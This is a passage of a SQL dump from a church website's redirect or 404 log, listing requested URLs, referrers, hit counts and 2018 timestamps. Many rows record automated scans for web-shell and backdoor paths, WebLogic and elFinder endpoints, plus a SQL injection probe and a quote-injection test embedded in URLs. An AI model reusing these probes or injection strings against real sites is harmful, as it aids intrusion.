(7717, 'https://lifeoasisinternationalchurch.org/plugins/editors/css.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 11:14:36', '0000-00-00 00:00:00', 301),
(7718, 'https://lifeoasisinternationalchurch.org/wp-api.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 11:41:47', '0000-00-00 00:00:00', 301),
(7719, 'https://www.lifeoasisinternationalchurch.org/joomla//components/com_b2jcontact/index.html', NULL, '', '', 1, 0, '2018-02-09 15:33:37', '0000-00-00 00:00:00', 301),
(7720, 'https://lifeoasisinternationalchurch.org/532299.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 16:36:59', '0000-00-00 00:00:00', 301),
(7721, 'https://lifeoasisinternationalchurch.org/532299.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 16:36:59', '0000-00-00 00:00:00', 301),
(7722, 'https://lifeoasisinternationalchurch.org/s.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-09 21:11:33', '0000-00-00 00:00:00', 301),
(7723, 'https://lifeoasisinternationalchurch.org/babbitts.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 21:48:36', '0000-00-00 00:00:00', 301),
(7724, 'https://lifeoasisinternationalchurch.org/layouts/joomla/content/info_block/bass.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-09 22:08:23', '0000-00-00 00:00:00', 301),
(7725, 'https://lifeoasisinternationalchurch.org/wp-blog-posts.php', NULL, 'http://site.ru', '', 5, 0, '2018-02-09 22:53:22', '0000-00-00 00:00:00', 301),
(7726, 'https://lifeoasisinternationalchurch.org/cli/851.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 23:44:17', '0000-00-00 00:00:00', 301),
(7727, 'https://lifeoasisinternationalchurch.org/tmp/c2.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-10 00:18:02', '0000-00-00 00:00:00', 301),
(7728, 'https://lifeoasisinternationalchurch.org/gallery.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-10 01:46:07', '0000-00-00 00:00:00', 301),
(7729, 'https://lifeoasisinternationalchurch.org/miwed.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-10 03:16:52', '0000-00-00 00:00:00', 301),
(7730, 'https://lifeoasisinternationalchurch.org/media/index.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-10 03:59:28', '0000-00-00 00:00:00', 301),
(7731, 'https://lifeoasisinternationalchurch.org/data.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-10 05:40:16', '0000-00-00 00:00:00', 301),
(7732, 'https://lifeoasisinternationalchurch.org/cron.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-10 06:54:49', '0000-00-00 00:00:00', 301),
(7733, 'https://lifeoasisinternationalchurch.org/css.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-10 07:38:22', '0000-00-00 00:00:00', 301),
(7734, 'https://lifeoasisinternationalchurch.org/language/lv-lv/lv-lv.localise2.php', NULL, 'http://site.ru', '', 5, 0, '2018-02-10 08:58:19', '0000-00-00 00:00:00', 301),
(7735, 'https://www.lifeoasisinternationalchurch.org/resources/live-streamingeppi reviewer', NULL, '', '', 1, 0, '2018-02-10 23:06:06', '0000-00-00 00:00:00', 301),
(7736, 'https://lifeoasisinternationalchurch.org/defined.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-11 05:43:52', '0000-00-00 00:00:00', 301),
(7737, 'https://www.lifeoasisinternationalchurch.org/asom-2015', NULL, '', '', 3, 0, '2018-02-11 07:40:01', '0000-00-00 00:00:00', 301),
(7738, 'https://www.lifeoasisinternationalchurch.org/privat', NULL, '', '', 5, 0, '2018-02-11 08:03:47', '0000-00-00 00:00:00', 301),
(7739, 'https://lifeoasisinternationalchurch.org/page.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-11 09:44:24', '0000-00-00 00:00:00', 301),
(7740, 'https://api.nike.comhttps//api.nike.com/commerce/productfeed/products/v1.5/snkrs/threads?country=cn&locale=zh_cn&withcards=false&limit=50&skip=7&upcoming=true', NULL, 'https://www.nike.com/cn/launch/?s=upcoming', '', 1, 0, '2018-02-11 21:27:14', '0000-00-00 00:00:00', 301),
(7741, 'https://www.lifeoasisinternationalchurch.org/streaming-private', NULL, '', '', 1, 0, '2018-02-11 23:34:21', '0000-00-00 00:00:00', 301),
(7742, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 7, 0, '2018-02-11 23:58:02', '0000-00-00 00:00:00', 301),
(7743, 'https://lifeoasisinternationalchurch.org/catalog/', NULL, '', '', 6, 0, '2018-02-12 09:43:19', '0000-00-00 00:00:00', 301),
(7744, 'https://lifeoasisinternationalchurch.org/cart/', NULL, '', '', 5, 0, '2018-02-12 09:43:31', '0000-00-00 00:00:00', 301),
(7745, 'https://www.lifeoasisinternationalchurch.org/catalog/', NULL, '', '', 5, 0, '2018-02-12 09:43:57', '0000-00-00 00:00:00', 301),
(7746, 'https://www.lifeoasisinternationalchurch.org/cart/', NULL, '', '', 5, 0, '2018-02-12 09:44:06', '0000-00-00 00:00:00', 301),
(7747, 'https://api.nike.comhttps//api.nike.com/launch/launch_views/v2/?filter=productid(7ea78bc9-1d17-579f-8adc-54d63f2d019c)', NULL, 'https://www.nike.com/cn/launch/?s=upcoming', '', 1, 0, '2018-02-12 12:18:59', '0000-00-00 00:00:00', 301),
(7748, 'https://lifeoasisinternationalchurch.org/scc.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-12 13:00:48', '0000-00-00 00:00:00', 301),
(7749, 'https://www.lifeoasisinternationalchurch.org/components/com_b2jcontact/index.html', NULL, '', '', 1, 0, '2018-02-12 17:29:52', '0000-00-00 00:00:00', 301),
(7750, 'https://lifeoasisinternationalchurch.org//blog/', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3, 0, '2018-02-12 17:48:01', '0000-00-00 00:00:00', 301),
(7751, 'https://www.lifeoasisinternationalchurch.org/wls-wsat/coordinatorporttype', NULL, '', '', 12, 0, '2018-02-13 05:08:09', '0000-00-00 00:00:00', 301),
(7752, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 3, 0, '2018-02-13 05:34:31', '0000-00-00 00:00:00', 301),
(7753, 'https://www.lifeoasisinternationalchurch.org/divine fulcrum', NULL, '', '', 1, 0, '2018-02-13 06:20:20', '0000-00-00 00:00:00', 301),
(7754, 'https://lifeoasisinternationalchurch.org/wls-wsat/coordinatorporttype', NULL, '', '', 5, 0, '2018-02-13 06:21:17', '0000-00-00 00:00:00', 301),
(7755, 'https://www.lifeoasisinternationalchurch.org/prayer/57-prophetic-words-for-day-5', NULL, '', '', 5, 0, '2018-02-13 12:33:31', '0000-00-00 00:00:00', 301),
(7756, 'https://142.4.21.132/wls-wsat/coordinatorporttype', NULL, '', '', 3, 0, '2018-02-16 15:51:40', '0000-00-00 00:00:00', 301),
(7757, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', NULL, '', '', 4, 0, '2018-02-18 06:11:20', '0000-00-00 00:00:00', 301),
(7758, 'https://www.lifeoasisinternationalchurch.org/livestreamimg', NULL, '', '', 1, 0, '2018-02-18 06:36:36', '0000-00-00 00:00:00', 301),
(7759, 'https://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/', NULL, '', '', 1, 0, '2018-02-18 06:53:27', '0000-00-00 00:00:00', 301),
(7760, 'https://lifeoasisinternationalchurch.org/media/system.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-18 09:52:23', '0000-00-00 00:00:00', 301),
(7761, 'https://lifeoasisinternationalchurch.org/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/o2k7.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-18 11:34:58', '0000-00-00 00:00:00', 301),
(7762, 'https://lifeoasisinternationalchurch.org/404/y.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-18 14:29:08', '0000-00-00 00:00:00', 301),
(7763, 'https://lifeoasisinternationalchurch.org/ciosan.php', NULL, '', '', 2, 0, '2018-02-18 14:57:57', '0000-00-00 00:00:00', 301),
(7764, 'https://lifeoasisinternationalchurch.org/templates/beez5/css/css.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-18 16:55:55', '0000-00-00 00:00:00', 301),
(7765, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=reset\'a=0&itemid=101', NULL, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=reset\'A=0&Itemid=101', '', 1, 0, '2018-02-18 17:01:40', '0000-00-00 00:00:00', 301),
(7766, 'https://lifeoasisinternationalchurch.org/media/media/default.php', NULL, 'http://site.ru', '', 6, 0, '2018-02-18 18:09:02', '0000-00-00 00:00:00', 301),
(7767, 'https://lifeoasisinternationalchurch.org/tmp/xml.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-18 18:38:28', '0000-00-00 00:00:00', 301),
(7768, 'https://lifeoasisinternationalchurch.org/imprima.php', NULL, '', '', 2, 0, '2018-02-18 22:25:26', '0000-00-00 00:00:00', 301),
(7769, 'https://lifeoasisinternationalchurch.org/xattacker.php?x=attacker', NULL, '', '', 2, 0, '2018-02-19 02:30:12', '0000-00-00 00:00:00', 301),
(7770, 'https://lifeoasisinternationalchurch.org/sizing.php', NULL, '', '', 3, 0, '2018-02-19 06:32:20', '0000-00-00 00:00:00', 301),
(7771, 'https://www.lifeoasisinternationalchurch.org/elfinder/php/connector.php', NULL, '', '', 1, 0, '2018-02-19 09:27:35', '0000-00-00 00:00:00', 301),
(7772, 'https://www.lifeoasisinternationalchurch.org/elfinder/php/connector.php', NULL, '', '', 1, 0, '2018-02-19 09:27:35', '0000-00-00 00:00:00', 301),
(7773, 'https://lifeoasisinternationalchurch.org/smalls.php', NULL, '', '', 5, 0, '2018-02-19 10:25:11', '0000-00-00 00:00:00', 301),
(7774, 'https://lifeoasisinternationalchurch.org/destinyinternationalcolleg/880-skyfaring-by-mark-vanhoenacker-download-epub-pdf', NULL, '', '', 1, 0, '2018-02-19 18:22:21', '0000-00-00 00:00:00', 301),
(7775, 'https://lifeoasisinternationalchurch.org/index.php/forum/welcome-mat/880-skyfaring-by-mark-vanhoenacker-download-epub-pdf', NULL, '', '', 1, 0, '2018-02-19 18:43:04', '0000-00-00 00:00:00', 301),
(7776, 'https://lifeoasisinternationalchurch.org/ministries/musci', NULL, '', '', 14, 0, '2018-02-20 01:36:24', '0000-00-00 00:00:00', 301),
(7777, 'https://www.lifeoasisinternationalchurch.org/prayer.html', NULL, '', '', 12, 0, '2018-02-20 07:42:58', '0000-00-00 00:00:00', 301),
(7778, 'https://lifeoasisinternationalchurch.org/eouds.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-20 11:51:07', '0000-00-00 00:00:00', 301),
(7779, 'https://lifeoasisinternationalchurch.org/followup/popup-pomo.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-20 11:52:12', '0000-00-00 00:00:00', 301),
(7780, 'https://lifeoasisinternationalchurch.org/index1.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-20 12:50:48', '0000-00-00 00:00:00', 301),
(7781, 'https://lifeoasisinternationalchurch.org/kadvl.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-20 13:47:22', '0000-00-00 00:00:00', 301),
(7782, 'https://lifeoasisinternationalchurch.org/c0nfig.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-20 13:47:36', '0000-00-00 00:00:00', 301),
(7783, 'https://lifeoasisinternationalchurch.org/mail/logo_img.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-20 16:41:09', '0000-00-00 00:00:00', 301),
(7784, 'https://lifeoasisinternationalchurch.org/aws.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-20 17:00:23', '0000-00-00 00:00:00', 301),
(7785, 'https://lifeoasisinternationalchurch.org/aa.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-21 05:50:33', '0000-00-00 00:00:00', 301),
(7786, 'https://lifeoasisinternationalchurch.org/bubus.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-21 07:05:16', '0000-00-00 00:00:00', 301),
(7787, 'https://lifeoasisinternationalchurch.org/changelog.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-21 08:53:02', '0000-00-00 00:00:00', 301),
(7788, 'https://lifeoasisinternationalchurch.org/fianetfraud/popup-pomo.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-21 11:51:26', '0000-00-00 00:00:00', 301),
(7789, 'https://lifeoasisinternationalchurch.org/content-wrapper.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-21 15:59:51', '0000-00-00 00:00:00', 301),
(7790, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/2?start=20', NULL, '', '', 6, 0, '2018-02-21 16:16:53', '0000-00-00 00:00:00', 301),
(7791, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/58-prayer-a-fasting-day', NULL, '', '', 3, 0, '2018-02-21 16:16:59', '0000-00-00 00:00:00', 301),
(7792, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/53-prayer-a-fasting-day-40', NULL, '', '', 5, 0, '2018-02-21 16:19:26', '0000-00-00 00:00:00', 301),
(7793, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/41-prayer-a-fasting-day-30', NULL, '', '', 4, 0, '2018-02-21 16:19:28', '0000-00-00 00:00:00', 301),
(7794, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/20-prayer-a-fasting-day-12', NULL, '', '', 10, 0, '2018-02-21 16:19:32', '0000-00-00 00:00:00', 301),
(7795, 'https://lifeoasisinternationalchurch.org/resources/iradio', NULL, '', '', 3, 0, '2018-02-21 18:40:14', '0000-00-00 00:00:00', 301),
(7796, 'https://lifeoasisinternationalchurch.org/gfedew.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-21 20:30:49', '0000-00-00 00:00:00', 301),
(7797, 'https://lifeoasisinternationalchurch.org/ciosans.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-22 01:21:41', '0000-00-00 00:00:00', 301),
(7798, 'https://lifeoasisinternationalchurch.org/admin_login.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-22 05:16:04', '0000-00-00 00:00:00', 301),
(7799, 'https://lifeoasisinternationalchurch.org/gg.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-22 06:38:46', '0000-00-00 00:00:00', 301),
(7800, 'https://lifeoasisinternationalchurch.org/wp-wpphp.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-22 08:28:05', '0000-00-00 00:00:00', 301),
(7801, 'https://lifeoasisinternationalchurch.org/tmp/r.php', NULL, 'http://site.ru', '', 9, 0, '2018-02-22 08:57:47', '0000-00-00 00:00:00', 301),
(7802, 'https://lifeoasisinternationalchurch.org/wp-xmlrpc.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-22 12:56:38', '0000-00-00 00:00:00', 301),
(7803, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=8&itemid=9', NULL, '', '', 1, 0, '2018-02-22 14:17:29', '0000-00-00 00:00:00', 301),
(7804, 'https://lifeoasisinternationalchurch.org/wolf.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-22 15:40:16', '0000-00-00 00:00:00', 301),
(7805, 'https://lifeoasisinternationalchurch.org/test/logo_img.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-22 16:56:08', '0000-00-00 00:00:00', 301),
(7806, 'https://lifeoasisinternationalchurch.org/templates/atomic/css/blueprint/src/src.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-22 17:33:12', '0000-00-00 00:00:00', 301),
(7807, 'https://lifeoasisinternationalchurch.org/tmp/tmp.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-22 18:34:55', '0000-00-00 00:00:00', 301),
(7808, 'https://www.lifeoasisinternationalchurch.org/?format=feed&type=atom&id=featured', NULL, '', '', 2, 0, '2018-02-22 18:50:14', '0000-00-00 00:00:00', 301),
(7809, 'https://lifeoasisinternationalchurch.org/good.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-22 19:19:09', '0000-00-00 00:00:00', 301),
(7810, 'https://lifeoasisinternationalchurch.org/nsecures.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-22 21:50:52', '0000-00-00 00:00:00', 301),
(7811, 'https://lifeoasisinternationalchurch.org/system_info.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-22 22:55:50', '0000-00-00 00:00:00', 301),
(7812, 'https://lifeoasisinternationalchurch.org/tmp/s.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-22 22:58:30', '0000-00-00 00:00:00', 301),
(7813, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content) order by 1-- kouc&view=article&id=13&itemid=213', NULL, '', '', 1, 0, '2018-02-22 23:42:50', '0000-00-00 00:00:00', 301),
(7814, 'https://lifeoasisinternationalchurch.org/sizings.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-23 01:01:51', '0000-00-00 00:00:00', 301),
(7815, 'https://lifeoasisinternationalchurch.org/upgrades.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-23 03:01:19', '0000-00-00 00:00:00', 301),
(7816, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/category/', NULL, '', '', 3, 0, '2018-02-23 03:51:35', '0000-00-00 00:00:00', 301),
(7817, 'https://lifeoasisinternationalchurch.org/plugins/captcha/captcha.php', NULL, 'http://site.ru', '', 5, 0, '2018-02-23 04:11:03', '0000-00-00 00:00:00', 301),
(7818, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/', NULL, '', '', 3, 0, '2018-02-23 04:25:07', '0000-00-00 00:00:00', 301),
(7819, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/category/', NULL, '', '', 3, 0, '2018-02-23 05:47:46', '0000-00-00 00:00:00', 301),
(7820, 'https://lifeoasisinternationalchurch.org/divine-agenda/itemlist/category/', NULL, '', '', 3, 0, '2018-02-23 06:35:47', '0000-00-00 00:00:00', 301),
(7821, 'https://lifeoasisinternationalchurch.org/divine-agenda/item/', NULL, '', '', 3, 0, '2018-02-23 06:43:28', '0000-00-00 00:00:00', 301),
(7822, 'https://lifeoasisinternationalchurch.org/partnership/20-demo/', NULL, '', '', 3, 0, '2018-02-23 07:59:45', '0000-00-00 00:00:00', 301),
(7823, 'https://lifeoasisinternationalchurch.org/templates/atomic/css/blueprint/plugins/link-icons/icons/icons.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-23 08:27:13', '0000-00-00 00:00:00', 301),
(7824, 'https://lifeoasisinternationalchurch.org/divine-agenda/itemlist/tag/', NULL, '', '', 3, 0, '2018-02-23 10:05:11', '0000-00-00 00:00:00', 301),
(7825, 'https://lifeoasisinternationalchurch.org/templates/atomic/css/blueprint/plugins/buttons/icons/icons.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-23 10:17:14', '0000-00-00 00:00:00', 301),
(7826, 'https://lifeoasisinternationalchurch.org/resources/french/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2018-02-23 11:05:07', '0000-00-00 00:00:00', 301),
(7827, 'https://lifeoasisinternationalchurch.org/index.php/create-an-account.html', NULL, 'https://lifeoasisinternationalchurch.org/index.php/create-an-account.html', '', 1, 0, '2018-02-25 18:00:28', '0000-00-00 00:00:00', 301),
(7828, 'https://lifeoasisinternationalchurch.org/component/tags/tag/', NULL, '', '', 8, 0, '2018-02-25 19:23:42', '0000-00-00 00:00:00', 301),
(7829, 'https://lifeoasisinternationalchurch.org/component/option,com_jfusion/itemid,4/index.php?option=com_user&view=register', NULL, 'https://lifeoasisinternationalchurch.org/component/option,com_jfusion/Itemid,4/index.php?option=com_user&view=register', '', 1, 0, '2018-02-26 03:53:20', '0000-00-00 00:00:00', 301),
(7830, 'https://lifeoasisinternationalchurch.org/so.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-27 11:02:35', '0000-00-00 00:00:00', 301),
(7831, 'https://lifeoasisinternationalchurch.org/cgi-bin/license.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-27 11:31:39', '0000-00-00 00:00:00', 301),
(7832, 'https://lifeoasisinternationalchurch.org/user.php', NULL, 'http://site.ru', '', 47, 0, '2018-02-27 12:42:27', '0000-00-00 00:00:00', 301),
(7833, 'https://lifeoasisinternationalchurch.org/resources/livestream1', NULL, '', '', 3, 0, '2018-02-27 13:00:20', '0000-00-00 00:00:00', 301),
(7834, 'https://www.lifeoasisinternationalchurch.org/index.php/tutorials/rev-olusola-ayodele-areogun', NULL, '', '', 3, 0, '2018-02-28 12:53:39', '0000-00-00 00:00:00', 301),
(7835, 'https://lifeoasisinternationalchurch.org/partnership.html', NULL, '', '', 10, 0, '2018-03-01 06:29:31', '0000-00-00 00:00:00', 301),
(7836, 'https://www.lifeoasisinternationalchurch.org/loic/onlinecommunities.php', NULL, '', '', 4, 0, '2018-03-01 08:00:47', '0000-00-00 00:00:00', 301),
(7837, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 3, 0, '2018-03-01 10:32:17', '0000-00-00 00:00:00', 301),
(7838, 'https://lifeoasisinternationalchurch.org/cgi-bin/cgi.php', NULL, 'http://site.ru', '', 1, 0, '2018-03-01 17:43:59', '0000-00-00 00:00:00', 301),
(7839, 'https://lifeoasisinternationalchurch.org/cgi-bin/bacot.php', NULL, 'http://site.ru', '', 1, 0, '2018-03-01 22:56:26', '0000-00-00 00:00:00', 301),
(7840, 'https://music.lifeoasisinternationalchurch.org/.well-known/apple-app-site-association', NULL, '', '', 1, 0, '2018-03-02 07:23:29', '0000-00-00 00:00:00', 301),
(7841, 'https://lifeoasisinternationalchurch.org/streaming/living by the answer', NULL, '', '', 1, 0, '2018-03-02 09:21:01', '0000-00-00 00:00:00', 301),
(7842, 'https://lifeoasisinternationalchurch.org/adminer-4.3.1-en.php', NULL, 'http://lifeoasisinternationalchurch.org/adminer-4.3.1-en.php', '', 1, 0, '2018-03-02 19:35:54', '0000-00-00 00:00:00', 301),
(7843, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/stewards', NULL, '', '', 1, 0, '2018-03-03 06:30:54', '0000-00-00 00:00:00', 301),
(7844, 'https://lifeoasisinternationalchurch.org/live-streaming/private', NULL, '', '', 1, 0, '2018-03-03 12:38:28', '0000-00-00 00:00:00', 301),
(7845, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/training', NULL, '', '', 1, 0, '2018-03-03 12:39:00', '0000-00-00 00:00:00', 301),
(7846, 'https://lifeoasisinternationalchurch.org/log.php', NULL, '', '', 6, 0, '2018-03-03 13:42:09', '0000-00-00 00:00:00', 301),
(7847, 'https://lifeoasisinternationalchurch.org/trainng', NULL, '', '', 1, 0, '2018-03-03 20:41:34', '0000-00-00 00:00:00', 301),
(7848, 'https://lifeoasisinternationalchurch.org/20-prayer-a-fasting-day-11', NULL, '', '', 4, 0, '2018-03-04 08:11:12', '0000-00-00 00:00:00', 301),
(7849, 'https://lifeoasisinternationalchurch.org/featured-messages/18-loic/50-young-achievers', NULL, '', '', 16, 0, '2018-03-04 09:18:40', '0000-00-00 00:00:00', 301),
(7850, 'https://lifeoasisinternationalchurch.org/theme.php', NULL, 'http://site.ru', '', 3, 0, '2018-03-04 11:32:12', '0000-00-00 00:00:00', 301),
(7851, 'https://lifeoasisinternationalchurch.org/theme.php', NULL, 'http://site.ru', '', 1, 0, '2018-03-04 11:32:12', '0000-00-00 00:00:00', 301),
(7852, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 1, 0, '2018-03-04 23:32:55', '0000-00-00 00:00:00', 301),
(7853, 'https://lifeoasisinternationalchurch.org/lib.php', NULL, 'http://site.ru', '', 2, 0, '2018-03-05 00:12:52', '0000-00-00 00:00:00', 301),
(7854, 'https://lifeoasisinternationalchurch.org/_.php', NULL, 'http://site.ru', '', 6, 0, '2018-03-05 09:48:14', '0000-00-00 00:00:00', 301),
(7855, 'https://lifeoasisinternationalchurch.org/bigm.php', NULL, 'http://site.ru', '', 5, 0, '2018-03-05 18:00:45', '0000-00-00 00:00:00', 301),
(7856, 'https://lifeoasisinternationalchurch.org/about-us', NULL, '', '', 2, 0, '2018-03-06 01:41:20', '0000-00-00 00:00:00', 301),
(7857, 'https://lifeoasisinternationalchurch.org/wp-seo.php', NULL, 'http://site.ru', '', 4, 0, '2018-03-06 01:46:22', '0000-00-00 00:00:00', 301),
(7858, 'https://lifeoasisinternationalchurch.org/config-sample.php', NULL, 'http://site.ru', '', 1, 0, '2018-03-06 02:25:19', '0000-00-00 00:00:00', 301),
(7859, 'https://lifeoasisinternationalchurch.org/ler.php', NULL, 'http://site.ru', '', 4, 0, '2018-03-06 02:31:36', '0000-00-00 00:00:00', 301),
(7860, 'https://lifeoasisinternationalchurch.org//xmlrpc.php', NULL, 'http://www.google.com.hk', '', 17, 0, '2018-03-09 18:07:42', '0000-00-00 00:00:00', 301),
(7861, 'https://www.lifeoasisinternationalchurch.org/index.php/frontend/login/en', NULL, '', '', 1, 0, '2018-03-09 22:31:38', '0000-00-00 00:00:00', 301),
(7862, 'https://lifeoasisinternationalchurch.org/index.php/frontend/login/en', NULL, '', '', 1, 0, '2018-03-09 22:31:41', '0000-00-00 00:00:00', 301),
(7863, 'https://www.lifeoasisinternationalchurch.org/loic-forum/12-resources', NULL, '', '', 6, 0, '2018-03-10 17:44:51', '0000-00-00 00:00:00', 301),
(7864, 'https://lifeoasisinternationalchurch.org/gobc-2014-online-registration', NULL, '', '', 10, 0, '2018-03-11 04:41:23', '0000-00-00 00:00:00', 301),
(7865, 'https://lifeoasisinternationalchurch.org/womencongress', NULL, '', '', 2, 0, '2018-03-11 08:17:13', '0000-00-00 00:00:00', 301),
(7866, 'https://lifeoasisinternationalchurch.org/streamingpe', NULL, '', '', 1, 0, '2018-03-11 10:19:34', '0000-00-00 00:00:00', 301),
(7867, 'https://lifeoasisinternationalchurch.org/resources/online-store', NULL, '', '', 3, 0, '2018-03-11 18:17:33', '0000-00-00 00:00:00', 301),
(7868, 'https://lifeoasisinternationalchurch.org/ministries/books', NULL, '', '', 6, 0, '2018-03-12 06:01:24', '0000-00-00 00:00:00', 301),
(7869, 'https://lifeoasisinternationalchurch.org/forum/', NULL, '', '', 3, 0, '2018-03-13 10:29:43', '0000-00-00 00:00:00', 301),
(7870, 'https://lifeoasisinternationalchurch.org/account/', NULL, '', '', 1, 0, '2018-03-13 15:32:29', '0000-00-00 00:00:00', 301),
(7871, 'https://lifeoasisinternationalchurch.org/forumregistration/', NULL, '', '', 1, 0, '2018-03-14 03:08:14', '0000-00-00 00:00:00', 301),
(7872, 'https://lifeoasisinternationalchurch.org/components/com_foxcontact/lib/', NULL, 'http://lifeoasisinternationalchurch.org/components/com_foxcontact/lib/', '', 1, 0, '2018-03-14 12:44:26', '0000-00-00 00:00:00', 301),
(7873, 'https://lifeoasisinternationalchurch.org/login/?action=register', NULL, '', '', 1, 0, '2018-03-14 15:56:43', '0000-00-00 00:00:00', 301),
(7874, 'https://lifeoasisinternationalchurch.org/sreamng', NULL, '', '', 1, 0, '2018-03-14 16:56:18', '0000-00-00 00:00:00', 301),
(7875, 'https://lifeoasisinternationalchurch.org/streamng', NULL, '', '', 2, 0, '2018-03-14 16:56:22', '0000-00-00 00:00:00', 301),
(7876, 'https://www.lifeoasisinternationalchurch.org/34-prayer-a-fasting-day-25', NULL, '', '', 4, 0, '2018-03-15 22:53:15', '0000-00-00 00:00:00', 301),
(7877, 'https://lifeoasisinternationalchurch.org/upload.php', NULL, '', '', 1, 0, '2018-03-16 13:00:25', '0000-00-00 00:00:00', 301),
(7878, 'https://lifeoasisinternationalchurch.org/63-day-11', NULL, '', '', 12, 0, '2018-03-16 14:29:55', '0000-00-00 00:00:00', 301),
(7879, 'https://lifeoasisinternationalchurch.org/resou', NULL, '', '', 1, 0, '2018-03-16 19:06:23', '0000-00-00 00:00:00', 301),
(7880, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=nwz3mnwae7a', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-03-16 21:27:55', '0000-00-00 00:00:00', 301),
(7881, 'https://www.lifeoasisinternationalchurch.org/jm-ajax/upload_file/', NULL, 'http://www.lifeoasisinternationalchurch.org/jm-ajax/upload_file/', '', 2, 0, '2018-03-17 01:27:58', '0000-00-00 00:00:00', 301),
(7882, 'https://www.lifeoasisinternationalchurch.org/streamingyou', NULL, '', '', 1, 0, '2018-03-17 13:02:50', '0000-00-00 00:00:00', 301),
(7883, 'https://lifeoasisinternationalchurch.org/index.php/142-day-16', NULL, '', '', 3, 0, '2018-03-17 22:13:52', '0000-00-00 00:00:00', 301),
(7884, 'https://lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference', NULL, '', '', 3, 0, '2018-03-18 08:47:24', '0000-00-00 00:00:00', 301),
(7885, 'https://www.lifeoasisinternationalchurch.org/a58acc3e-af88-3b40-835a-7de6c53e1c15/2356e836-af7a-ca43-b8c6-6e622a1f95b0/from?get&nocache=1bb58', NULL, 'https://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2018-03-18 09:05:06', '0000-00-00 00:00:00', 301),
(7886, 'https://www.lifeoasisinternationalchurch.org/a58acc3e-af88-3b40-835a-7de6c53e1c15/2356e836-af7a-ca43-b8c6-6e622a1f95b0/shutdown/null?null&nocache=13dfd', NULL, 'https://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2018-03-18 11:01:54', '0000-00-00 00:00:00', 301),
